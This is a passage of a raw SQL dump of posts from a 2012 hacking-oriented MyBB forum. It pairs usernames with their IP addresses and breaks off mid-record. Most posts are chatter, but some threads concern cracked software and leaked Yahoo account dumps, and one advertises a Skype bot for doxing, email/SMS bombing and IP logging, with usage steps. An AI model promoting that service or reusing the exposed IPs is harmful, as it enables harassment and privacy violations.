'7340', '28', 'RE: New Section Added in VIP tab', '0', '257', 'XxTREYZxX', '1352548036', 'Thanks so much joker.\nThis is great.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '24674e48ce04abfde7c62f2d31c17696', '0', '0'); INSERT INTO mybb_posts VALUES('7362', '238', '1021', '56', 'RE: Ban the user above you', '0', '228', 'VirtualLegend', '1352550229', 'Banned for having a shitty signature', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7685138f70e5cd32f5b60cb5d59d9730', '0', '0'); INSERT INTO mybb_posts VALUES('7363', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '228', 'VirtualLegend', '1352550333', 'Nice Video\n\nEveryone thumbs up it :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '77d7e9000d145f6aae7f6afbda0eda4a', '0', '0'); INSERT INTO mybb_posts VALUES('7364', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '228', 'VirtualLegend', '1352550375', 'Thanks but it still works', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ae48db389d648eb46a75f424492f62b8', '0', '0'); INSERT INTO mybb_posts VALUES('7365', '1242', '7327', '34', 'RE: Another thread design PSD', '0', '228', 'VirtualLegend', '1352550454', 'Nice Thread Design\n\nDo you have one with a green theme ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e56e60860d9d21dea100aaf0c57eb766', '0', '0'); INSERT INTO mybb_posts VALUES('7366', '1245', '7340', '28', 'RE: New Section Added in VIP tab', '0', '228', 'VirtualLegend', '1352550649', 'Good job Joker\n\nI\'m gonna post some VIP thread designs :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ac62e0b88ed200c98fd1ec1a35f012cd', '0', '0'); INSERT INTO mybb_posts VALUES('7367', '1245', '7340', '28', 'RE: New Section Added in VIP tab', '0', '82', 'iTzIpod', '1352550776', 'Thanks for the notice and update to the forum, t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '316d885577f4e4577754b6889d528609', '0', '0'); INSERT INTO mybb_posts VALUES('7368', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352550814', 'I\'ll take a look into this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'da7076cac8490caf85a2dd9012169ea6', '0', '0'); INSERT INTO mybb_posts VALUES('7369', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '62', 'R?????zo?', '1352550890', 'yeah it works like a charm :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19f621bfe481b36b354d60a7072e70f6', '0', '0'); INSERT INTO mybb_posts VALUES('7370', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1352550904', 'Gonna post some maybe tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8fde1b8cd77f2e231ed365e3607014a', '0', '0'); INSERT INTO mybb_posts VALUES('7372', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '62', 'R?????zo?', '1352551004', 'Never got hacked throught pishing :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9ec535c88526d3f39fed7edca27287e8', '0', '0'); INSERT INTO mybb_posts VALUES('7373', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352551007', 'I get this issue whenever I post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af2717db781ae9feace5f3a712c0c922', '0', '0'); INSERT INTO mybb_posts VALUES('7374', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '82', 'iTzIpod', '1352551072', 'Good job p420 keep up the content.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d88559c138652b5514cb468df16bf7c', '0', '0'); INSERT INTO mybb_posts VALUES('7375', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352551132', 'Congratulations everyone on their post milestones.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '51592bea36c2489c6ef8b3a66cc1a27c', '0', '0'); INSERT INTO mybb_posts VALUES('7376', '426', '7339', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1352551193', '[quote=\'t3h jok3r\' pid=\'7339\' dateline=\'1352529485\']\r\nDownloaded it.\r\n\r\nIs this the same pack I gave you once Ipod? Anyway I verified that mediafire download ID g8qa22aqmftitlq is safe.\r\n[/quote]\r\n\r\nNo. It was a different pack. But yeah thanks for verifying it\'s safe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ed7a6a31c9a63db154294bd5da96d30', '0', '0'); INSERT INTO mybb_posts VALUES('7377', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352551261', 'You can put the files anywhere. It doesn\'t matter where you put it. I just put mine in my Downloads folder or on my desktop files. Either way it doesn\'t matter. It still opens and runs perfectly fine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '575fd4cbcf9dd5f053b527793ce0af3c', '0', '0'); INSERT INTO mybb_posts VALUES('7378', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352551301', '62 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cd22af5e9c9333c5328a0179895c0b2', '0', '0'); INSERT INTO mybb_posts VALUES('7379', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352551355', 'Looks like I won again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f6b606b50cebb884f7a11b5b205d0c4', '0', '0'); INSERT INTO mybb_posts VALUES('7380', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352551403', '/me is happy it\'s the weekend.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16277dc057ff76bf803e14fa80caadbd', '0', '0'); INSERT INTO mybb_posts VALUES('7381', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352551441', 'Granted but it wouldn\'t work.\nI wish the weekend is more than 2 days.. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47a24324567dcb7e19d0440c4fff0b66', '0', '0'); INSERT INTO mybb_posts VALUES('7382', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352551496', '@Romdu62 what can you do with a L33tHacking Forwarder email. ._.\n10/10 Trey.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f09ce602a8c27055db8337059c5b3637', '0', '0'); INSERT INTO mybb_posts VALUES('7383', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352551526', 'Banned for having the Angel award.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '81c233afcfb7865fe411f5f21347762c', '0', '0'); INSERT INTO mybb_posts VALUES('7384', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '82', 'iTzIpod', '1352551572', 'Nice video Timmy. Thanks for the major contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0985b72c2635b44bec69865ff37d1a1', '0', '0'); INSERT INTO mybb_posts VALUES('7385', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352551606', 'Oh okay @sirchamp, I didn\'t know that. :/ That sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6d92e851604fbd8efc35fbfa0e246c3', '0', '0'); INSERT INTO mybb_posts VALUES('7386', '1242', '7327', '34', 'RE: Another thread design PSD', '0', '82', 'iTzIpod', '1352551639', 'Oh my God this thread design is so nice!!\nThanks for sharing', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1ae58d89f97996ecc3c9603d40e203a', '0', '0'); INSERT INTO mybb_posts VALUES('7465', '1251', '7462', '3', 'RE: [Bug] Award Icons', '0', '1', 't3h jok3r', '1352603851', 'It\'s fixed now. Thanks for reporting.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c458615df1dcd93a415c68b3e79ebdd9', '0', '0'); INSERT INTO mybb_posts VALUES('7466', '1170', '7461', '63', 'RE: Need a sig', '0', '1', 't3h jok3r', '1352603954', '[quote=\'iTzIpod\' pid=\'7461\' dateline=\'1352598065\']\r\nWhat do you mean?\r\nLike make it match the forum\'s colors?\r\n[/quote]\r\n\r\nI do think he means that. He just didn\'t capitalize LH, if you do then the meaning is clear.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f1a8a32e6af661799be98675c29c6014', '0', '0'); INSERT INTO mybb_posts VALUES('7388', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '341', 'bouabda', '1352555401', 'Thnaks dude , i appriciate it ^^', '197.6.136.191', '-989427521', '0', '0', '0', '0', '1', '4ad9b519930afdb9103595e052f1bb6d', '0', '0'); INSERT INTO mybb_posts VALUES('7389', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '341', 'bouabda', '1352555433', 'thanx bro :D keep us posted', '197.6.136.191', '-989427521', '0', '0', '0', '0', '1', 'ac8fe7a593dc4399bdf0c13d2aacb95f', '0', '0'); INSERT INTO mybb_posts VALUES('7390', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '257', 'XxTREYZxX', '1352557552', 'I will be glad to try this.posting for it', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '22b1eb5b9aad9e413bedfb63d0c9f704', '0', '0'); INSERT INTO mybb_posts VALUES('7391', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352558249', 'Band because he is a ipod', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'c296b593df9ad67ed40cbae5605140b5', '0', '0'); INSERT INTO mybb_posts VALUES('7392', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '228', 'VirtualLegend', '1352558270', 'I have the same problems, First i thought it was just me', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '1b4e4003395c08fc22a365d8f009d18a', '0', '0'); INSERT INTO mybb_posts VALUES('7393', '238', '1021', '56', 'RE: Ban the user above you', '0', '228', 'VirtualLegend', '1352558312', 'Banned for a stupid comment', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '81356ba60a9a12ffa9f5118eaf2fbcf4', '0', '0'); INSERT INTO mybb_posts VALUES('7394', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '257', 'XxTREYZxX', '1352558418', 'We all have the same problem so hopefully it gets fixed.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'dd6e335c0edde4e474cee547ac47d4f9', '0', '0'); INSERT INTO mybb_posts VALUES('7395', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352559797', 'banned for having 10 rep.\ntoo even', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'aff0da6a8dc61edefeeec0c1ce8d52aa', '0', '0'); INSERT INTO mybb_posts VALUES('7396', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352560685', 'Banned for having 13 rep.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4034a9879fadf986022a07511daea54', '0', '0'); INSERT INTO mybb_posts VALUES('7397', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '82', 'iTzIpod', '1352562104', 'I usually make graphics from tutorials I find on a different forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0768f4aee6d274dbdb2d90524a0aa7f0', '0', '0'); INSERT INTO mybb_posts VALUES('7399', '1222', '7232', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '4', 'Triple H', '1352571980', 'Hoping my email address is not on the list. Thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70dbffe0f21863db8205dde5a0efc436', '0', '0'); INSERT INTO mybb_posts VALUES('7400', '991', '5592', '14', 'RE: VPN Accounts With Guide :)', '0', '4', 'Triple H', '1352572115', 'Thanks this is a great tutorial. I needed help for VPNReactor.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '62bb07c71f2ec5b72ce8d4a05fa815a4', '0', '0'); INSERT INTO mybb_posts VALUES('7401', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '61', 'NXK', '1352572938', 'Hi! Welcome I hope you enjoy us here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '8cc79cfdbb79032d34480dfa55e7edb9', '0', '0'); INSERT INTO mybb_posts VALUES('7402', '1144', '6958', '11', 'RE: What can you do with?', '0', '53', 'sirchamp', '1352575400', '[quote=\'Triple H\' pid=\'6958\' dateline=\'1351918876\']\r\nYou can DOX them, boot them offline, send them viruses or steal all their keystrokes.\r\n[/quote]\r\n\r\nYou cant send them virues or steal their keystrokes if you have their ip adress lol.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd4e38f33e006d7b1a6055b062dc3b24a', '0', '0'); INSERT INTO mybb_posts VALUES('7403', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '61', 'NXK', '1352575842', 'I like number 2.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f0244734bff9253edc3ae22c9c986ae1', '0', '0'); INSERT INTO mybb_posts VALUES('7404', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '1', 't3h jok3r', '1352576286', 'Uhh can admins get a free one and does this work for adf.ly?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'abd4ded499e8c7e3daab9f13a3540b19', '0', '0'); INSERT INTO mybb_posts VALUES('7405', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '1', 't3h jok3r', '1352576457', 'Welcome to L33T Hacking. Hope you enjoy your stay.\n\nFeel free to contact me if you need help or have any questions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ee351733eb4f4852511f20daa6408f80', '0', '0'); INSERT INTO mybb_posts VALUES('7406', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '342', 'Squirt1971', '1352577053', 'Thanks for the welcoming :D', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', 'fe1d22a1fa3d4c3c2458f1be2c8a4c46', '0', '0'); INSERT INTO mybb_posts VALUES('7407', '1248', '0', '3', 'Recent Updates', '0', '1', 't3h jok3r', '1352577684', 'I have been updating a lot of things on L33T Hacking but didn\'t inform the community well anyways here\'s some of the updates.\r\n\r\n[color=#FF0000]Marketplace will be added soon in November.[/color]\r\n\r\n[color=#1E90FF]We are having some [url=http://l33thacking.net/thread-1236.html]Cloudflare issues[/url] which I am currently working on.[/color]\r\n\r\n[color=#FFA500]Username changes, IP log History and Myawards plugins are completely removed from LH because the plugins are outdated and the old man Omni is too lazy.[/color]\r\n\r\n[color=#32CD32]I\'m planning on expanding LH especially the hacking section but in order to expand I need more active members. If you would like to help advertise LH then PM me or share LH on sites you visit everyday. Adding new forums in the computing section, if you want to see a section then suggest one [url=http://l33thacking.net/thread-1169.html]here[/url][/color]\r\n\r\n[color=#800080]I have changed the Rep abuse section name to \"Private Inquiries\".\r\nRead the forum rules to know what you are allowed to post about.[/color]\r\n\r\n[color=#A9A9A9]There have been some changes in the report system. If you see a thread with a download but no virus scan you can report it as \"infected download/link or no virus scan\". I also added a new report reason called \"Post here & PM\" to report all post here and I pm you or you PM me threads.[/color]\r\n\r\n[color=#FF4500]We might be getting new userbars for LH, there will be thread for the community to vote.[/color]\r\n\r\n[color=#800000]Username in welcome block :- I know it\'s kinda hard to read sometimes but I\'m currently working on it. The theme we are using is old.[/color]\r\n\r\n[color=#FF1493]Our Alexa rank is now below 2,000. A month ago it was 5,000, L33T Hacking is growing fast :D\r\nHere\'s a link to our Alexa page: [/color] http://www.alexa.com/siteinfo/l33thacking.net', '72.231.24.165', '1223104677', '1', '0', '1', '1352578807', '1', 'ff9761f400449ae0ebde55f71481de9b', '0', '1352578807'); INSERT INTO mybb_posts VALUES('7408', '1248', '7407', '3', 'RE: Updates for the November', '0', '61', 'NXK', '1352578135', 'Yay! More progress is being made and to see we\'re getting more popular is very nice!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'ce5423c339e13a3e9b5c11b886d8ff09', '0', '0'); INSERT INTO mybb_posts VALUES('7409', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352579944', 'Good job t3h jok3r. :) I\'ll continue to be active.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ef4c4656944ba1396803a197392c3fe8', '0', '0'); INSERT INTO mybb_posts VALUES('7410', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352579990', 'I doubt it works for Adf.ly since Adf.ly only allows 1 Adf.ly link open at a time. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd247cec6c306bd504886aec4e8cae36', '0', '0'); INSERT INTO mybb_posts VALUES('7411', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '82', 'iTzIpod', '1352580055', 'Welcome to the forum Squirt1971! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb7f0a29e8fff5ef4aceeeadde23532e', '0', '0'); INSERT INTO mybb_posts VALUES('7412', '1249', '0', '35', 'New Avatar', '0', '82', 'iTzIpod', '1352580089', 'Do you guys like my new avatar? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0b775ecc24bedfa22331258a00f512eb', '0', '0'); INSERT INTO mybb_posts VALUES('7413', '1248', '7407', '3', 'RE: Recent Updates', '0', '228', 'VirtualLegend', '1352580220', 'Okay thanks for the heads up', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '46257e7d8e4d53834edf25d96b29a7a2', '0', '0'); INSERT INTO mybb_posts VALUES('7414', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '228', 'VirtualLegend', '1352580285', 'I agree with NXK\n\nNumber 2', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c2b888ec46738032d6667ab42926ca63', '0', '0'); INSERT INTO mybb_posts VALUES('7415', '1249', '7412', '35', 'RE: New Avatar', '0', '228', 'VirtualLegend', '1352580321', 'I Like the pokemon before', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '92f53471980a29d71b0f940407ed6233', '0', '0'); INSERT INTO mybb_posts VALUES('7416', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1352580396', 'Trust me it works, I\'m using it daily', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '29b8bce85b7fa676b4375f7f2c52a8a9', '0', '0'); INSERT INTO mybb_posts VALUES('7417', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352583431', ':p I like this one better! >:D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6330bacaca1c32a3c5ba5a1c40effa00', '0', '0'); INSERT INTO mybb_posts VALUES('7418', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '82', 'iTzIpod', '1352583485', 'Set #2 looks fancy. :p I like it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1b9700315f07784c6f5cdb60d7e6678f', '0', '0'); INSERT INTO mybb_posts VALUES('7419', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352583518', 'For Adf.ly?\nDid you get paid?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d6c80b103e1b63b3cff823d0a210de8', '0', '0'); INSERT INTO mybb_posts VALUES('7420', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '62', 'R?????zo?', '1352587541', 'Keep the current ones pleaaaaase!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd1183371fe2d82da9c7eab7c516f6863', '0', '0'); INSERT INTO mybb_posts VALUES('7421', '1249', '7412', '35', 'RE: New Avatar', '0', '62', 'R?????zo?', '1352587611', 'I don\'t know who\'s even that character but it looks cool :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6c6a9622bbfc5dcdbb9339d11540e3d6', '0', '0'); INSERT INTO mybb_posts VALUES('7422', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '62', 'R?????zo?', '1352587713', 'Look great, keep up the good work.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ae39cc079922a123eacad1ab0d614c36', '0', '0'); INSERT INTO mybb_posts VALUES('7423', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '62', 'R?????zo?', '1352588324', 'Good Idea, I will post some more content here now.\nI\'ve been kinda inactive lately but I will be back :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '354f8433c8255109bf3fafe161174952', '0', '0'); INSERT INTO mybb_posts VALUES('7424', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1352588356', 'Wierd you are mod, you should be able to?\nOr is just the leader thingy?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '55c0d18e8b809fc01acb00a8fb11186c', '0', '0'); INSERT INTO mybb_posts VALUES('7425', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1352588387', 'I\'m gonna post some now I think :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6e6f24515c55df42d58ed52fdf94dddb', '0', '0'); INSERT INTO mybb_posts VALUES('7426', '1250', '0', '61', 'Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '62', 'R?????zo?', '1352588484', '[align=center]\r\n[lock]\r\n[url=skype:SkypeResponce?chat][img]http://mystatus.skype.com/smallclassic/SkypeResponce[/img][/url]\r\n[/lock]\r\nAdd and send pm \" .invite() \"[/align]\r\nHere some screenshots\r\n[img]http://i.minus.com/iYWKlgfcePl1W.png[/img]\r\nIn Action\r\n[img]http://i.minus.com/iFBWFrnhkQp0U.png[/img]\r\n[img]http://i.minus.com/ixEqbD5WiO0fL.png[/img]\r\n\r\nHow to use\r\n[lock]\r\nOpen Skype>Add Contacts>Username>SkypeResponce\r\nType .invite() then .info() and choice a command\r\n[lock]\r\n\r\ncredits: HardCoreSmasher', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '291091fcca4703038868d93593903862', '0', '0'); INSERT INTO mybb_posts VALUES('7427', '1250', '7426', '61', 'RE: Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '82', 'iTzIpod', '1352589058', 'Lock doesn\'t seem to work here??', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db950a1588da6fee41d38971e79bbfd8', '0', '0'); INSERT INTO mybb_posts VALUES('7428', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352589100', 'I know this was exactly what I said when I got it Reloadzor. :p\nAnd I liked it because of that hair! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64c16afb0ac203b5823494612d00ee8f', '0', '0'); INSERT INTO mybb_posts VALUES('7429', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352589145', 'I don\'t think the lock MyCode doesn\'t work in here? Not sure.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1501c464ceeeebdee7bf440ba5af17bc', '0', '0'); INSERT INTO mybb_posts VALUES('7430', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1352589176', 'I think it\'s just the leader thing I\'m not quite sure. I should be able too though..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '20e5b29810981f6766b9615f3f64b42d', '0', '0'); INSERT INTO mybb_posts VALUES('7432', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '1', 't3h jok3r', '1352589787', 'It works in this section. It works in all the forums on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '915915cd669b136aa492fb47b95e2506', '0', '0'); INSERT INTO mybb_posts VALUES('7433', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '342', 'Squirt1971', '1352593640', 'Thanks :D I just downloaded it', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', '86392e5eb8fa57eb976c8452c77d2c76', '0', '0'); INSERT INTO mybb_posts VALUES('7434', '1249', '7412', '35', 'RE: New Avatar', '0', '257', 'XxTREYZxX', '1352593800', 'It looks cool as where did you find it.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'd8d18382cbe56231bae21facef9659a9', '0', '0'); INSERT INTO mybb_posts VALUES('7435', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '257', 'XxTREYZxX', '1352593901', 'just read this thanks heaps its mainly for begginers.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '1978b4cf71ae67737a8651d5f8cb668e', '0', '0'); INSERT INTO mybb_posts VALUES('7436', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '257', 'XxTREYZxX', '1352594009', 'Thanks heaps posting so i can get it.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'eb39e338a8413d40f6c389711164e4bb', '0', '0'); INSERT INTO mybb_posts VALUES('7437', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '257', 'XxTREYZxX', '1352594088', 'I really like the first one its cool and fancy.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'b5ab22fbb9ecc0426a156d8febc1d247', '0', '0'); INSERT INTO mybb_posts VALUES('7438', '1248', '7407', '3', 'RE: Recent Updates', '0', '257', 'XxTREYZxX', '1352594228', 'Great work every one on the forums.\nWhat\'s the market place.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '59d59d2de47a956d08f4ea1118585e17', '0', '0'); INSERT INTO mybb_posts VALUES('7439', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '257', 'XxTREYZxX', '1352594381', 'Welcome to the forums bud, how did you find us.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'c3dff1eee9715014346d6852805be6fd', '0', '0'); INSERT INTO mybb_posts VALUES('7440', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352594521', 'Banned for having 29 rep.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '96db7c76188bd9500d31741151a0713c', '0', '0'); INSERT INTO mybb_posts VALUES('7441', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1352594655', '/me is having internet and cloudfare issues', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '87c55d8f1786f840d75e54cb4047f487', '0', '0'); INSERT INTO mybb_posts VALUES('7442', '487', '2354', '56', 'RE: Corrupt a wish', '0', '257', 'XxTREYZxX', '1352595098', 'Granted but then we wouldn\'t have school to learn\nI wish i was joker', '101.162.139.13', '1705151245', '1', '0', '257', '1352595145', '1', 'baa10b8eb35d7bf68ab965caa3c14740', '0', '1352595145'); INSERT INTO mybb_posts VALUES('7443', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352595806', 'what do i win.\nwait i won whooo.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '09425f1356dc12f31769a1d982c74934', '0', '0'); INSERT INTO mybb_posts VALUES('7444', '253', '1106', '56', 'RE: Count to 200', '0', '257', 'XxTREYZxX', '1352595874', '63,64,65,150 whoa we are on 150', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '38a4179d7af3167d14fa9c8cba8e6e66', '0', '0'); INSERT INTO mybb_posts VALUES('7445', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1352596033', 'I dont know what post i am on.i am posting now to see what post i have.\ncongratz LH', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'ea6ad09532ab829efb9eefd4763afc05', '0', '0'); INSERT INTO mybb_posts VALUES('7446', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352597444', 'Oh I saw a thread of Reloadzor\'s that I didn\'t post in and the lock Mycode wasn\'t activated. Oh wait, nevermind it\'s because I\'m a moderator of this section I think. Other than that, @t3h jok3r, how come I can\'t access the Group memberships thing to view Unique\'s Members?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e679195f001f1df2fd38489dbb4151f7', '0', '0'); INSERT INTO mybb_posts VALUES('7447', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352597485', 'My friend gave it to me. :p I picked it because it looks cool.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f05acade4204d439ecc0df43d3c87d23', '0', '0'); INSERT INTO mybb_posts VALUES('7448', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1352597515', 'Yes. Thanks for that bump. :3\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b19605553e8ac8d046d40c22bffd88ed', '0', '0'); INSERT INTO mybb_posts VALUES('7449', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352597573', 'The Marketplace Section is basically the \'Buy and Sell\' Section. Like a Marketplace. Kinda pretty self explanatory.. ._.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46ad766d71d38adeac47d674959a89d5', '0', '0'); INSERT INTO mybb_posts VALUES('7450', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1352597601', 'No I wasnt rushing you. Thanks and for first one can you make background like lh background?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ddd9848bdea78ffefee40fd1e0c97613', '0', '0'); INSERT INTO mybb_posts VALUES('7451', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352597603', 'Banned for having 431 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 